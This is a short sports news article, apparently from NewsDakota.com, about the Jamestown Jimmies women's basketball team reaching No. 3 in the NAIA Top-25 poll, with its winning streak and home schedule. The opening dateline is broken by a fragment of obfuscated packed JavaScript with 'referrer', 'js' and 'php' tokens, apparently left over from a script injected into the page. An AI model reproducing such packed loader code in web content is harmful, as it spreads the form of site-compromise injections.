JAMESTOWN inbzb|var|u0026u|referrer|tdzri||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- The Jimmie women’s basketball team has broke a school record yesterday when they were named the No. 3 team in the latest NAIA Top-25 poll. They sit in a tie with Davenport (MI) who holds a record of 14-1, but their lone loss came against unranked Cornerstone (MI).

The Jimmies only loss of the season was a home lost to No. 2 Northwestern. Since then the Jimmies have rattled off 12 wins in a row and a clean sweep of a tough December schedule. They picked up wins over 4 ranked teams during the month, two of which came on the road. The win over Morningside will technically be a neutral site win, but the Morningside campus sits six miles away from Briar Cliff, where the game was played.

Jamestown will play Oglala Lakota College on Sunday at the Civic Center that will kick-off a string of four straight home games, including the NSAA opener against No. 19 Mayville State on January 22nd.

Next game on the radio will be January 16th when Johnson & Wales visits.
